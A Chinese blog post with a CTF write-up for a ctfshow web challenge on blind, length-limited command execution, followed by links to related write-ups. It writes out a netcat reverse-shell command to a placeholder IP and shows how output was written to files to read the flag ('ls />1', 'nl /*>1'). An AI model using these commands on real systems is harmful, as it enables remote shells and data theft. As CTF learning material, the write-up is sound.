ctfshow七夕杯web签到wp

最新推荐文章于 2024-05-10 16:35:19 发布
最新推荐文章于 2024-05-10 16:35:19 发布
阅读量323 收藏
点赞数
分类专栏: CTF-WEB 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35782055/article/details/128487075
版权

启动环境
在这里插入图片描述
无回显命令执行
想到反弹shell
尝试写

nc xxx.xxx.xxx.xxx 9000 -e /bin/sh

执行的时候发现太长
那试试能不能重定向写文件

ls >1

在这里插入图片描述
发现是可以的,访问api/1 路径
发现确实是写入了
那么找找看flag位置,盲猜一手根目录

ls />1

在这里插入图片描述
确实在啊
那么试试能不能较短的语句给他带出来

nl /*>1

在这里插入图片描述
刚好满足长度,多一个字符就执行失败

丨Arcueid丨
关注
专栏目录
ctfshow七夕web
m0_68074153的博客
08-06 2223
限制长度命令执行,php伪协议,反弹shell
CTFShow-WEB(签到题~5) WP
PP Jun的博客
08-01 1037
CTFSHOW七夕web
羽的博客
08-05 2100
CTFSHOW 七夕web
ctfshow 七夕
blowed的博客
08-16 999
ctfshow 七夕
ctfshow-web七夕
记录学习,一起进步
05-10 325
ctfshow-web七夕
ctfshow-菜狗-WEB-wp
F1rstb100d
11-14 1362
ctfshow-菜狗-WEB-wp
七夕web期末作业网站设计
最新发布
06-20
七夕节是中国的传统节日,也被称为“牛郎织女节”,在Web期末作业的设计中,你可以考虑以下几个关键元素来打造一个既具有文化特色又实用的网站: 1. **首页设计**:可以使用传统元素如鹊桥、牛郎织女的画像或相关的...
七夕表白Chrome插件
07-28
总的来说,【七夕表白Chrome插件】利用了Web开发中的多种技术,包括HTML、CSS、JavaScript(特别是jQuery和Canvas API)以及图片资源,创造出一个富有情感表达的互动体验。这样的插件不仅展示了前端技术的强大,也...
七夕板:放大react web app的愿望
02-17
七夕板 嘿! 你想许个愿吗? 这是部署的链接: : 该项目是通过。 可用脚本 在项目目录中,可以运行: npm start 在开发模式下运行应用程序。 打开在浏览器中查看。 如果进行编辑,页面将重新加载。 您还将在...
qixi_love:七夕web动画演示
05-15
qixi_love 七夕web动画演示
七夕表白代码.zip
05-22
在这个名为“七夕表白代码.zip”的压缩包中,包含了程序员为表达爱意而精心准备的一份特别礼物。这个项目的核心是使用编程技术,尤其是Java Web和HTML,来创作一个充满情感的互动体验。通过这样的方式,程序员将他们...
ctfshow 七夕(复现)
as you know, nlp is fantasitc!
08-07 1658
最终执行命令的语句是 $num1$symbol$num2 拼接起来的,而且过滤()不能调用函数,所以根据语言结构是 include、require、echo这种语句,试着去包含文件。这个题可以理解为注入,在整个计算语句中注入我们想要执行的命令语句,只不过是过滤()之后不能调用函数执行。我开始这样做了,但是最后并没有做出来的原因是:我一直在网站根目录下看有没有生成文件,实际上这条命令执行在api这个目录下,生成的文件也在这个目录下,所以需要到/api这个目录下去寻找是否生成文件。,尝试别的地方,发现。...
Web】CTFSHOW 七夕 题解
uuzeray的博客
05-10 447
一眼命令拼接,先fuzz一下可以用的字符。过滤了括号,不难想到用include。也可以打临时文件RCE。直接nginx日志包含。直接nc反弹shell。
CTFshow - 七夕复现
Pai_Space
10-24 800
CTFshow 七夕
CTFSHOW-七夕
y2xsec的博客
12-04 173
看汇编就可以看到字符串,小端序倒序一下转字符串就解得了。
ctfshow七夕
qq_45705626的博客
08-06 302
ctfshow七夕
cftshow 七夕 web部分WP
绮洛Ki1ro的博客
08-06 1064
别人七夕陪情侣,我在七夕死做题。。。。好吧,先不想别的了,这次七夕web前三题还算简单都做出来了,最后一题是关于java sql注入的,java还没学得很好,就没做了,看了群主的直播感觉还是很有难度的,难怪无一人解出。......
ctfshow七夕2022
Pysnow's Blog
08-06 1183
https://pysnow.cn/archives/281/
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值